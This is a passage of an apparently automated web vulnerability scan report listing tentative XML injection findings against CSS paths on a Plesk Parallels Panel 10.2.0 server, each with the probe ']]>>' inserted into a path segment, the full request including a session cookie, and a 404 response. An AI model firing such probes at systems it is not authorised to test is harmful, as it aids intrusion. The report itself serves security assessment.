<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.141. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/desktop.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/main/desktop.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:18 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.142. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/desktop.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/main/desktop.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:20 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.143. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/desktop.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/main/desktop.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.144. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/desktop.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/main/desktop.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:24 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.145. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/desktop.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main]]>>/desktop.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:26 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.146. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/desktop.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main/desktop.css]]>>?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:28 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.147. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/double-list-control.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/main/double-list-control.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:06 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.148. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/double-list-control.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/main/double-list-control.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:08 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.149. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/double-list-control.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/main/double-list-control.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:09 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.150. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/double-list-control.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/main/double-list-control.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:11 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.151. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/double-list-control.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main]]>>/double-list-control.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:13 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.152. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/double-list-control.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main/double-list-control.css]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:16 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.153. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/layout.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/main/layout.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:18 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.154. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/layout.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/main/layout.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:20 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.155. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/layout.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/main/layout.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.156. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/layout.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/main/layout.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:24 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.157. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/layout.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main]]>>/layout.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:26 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

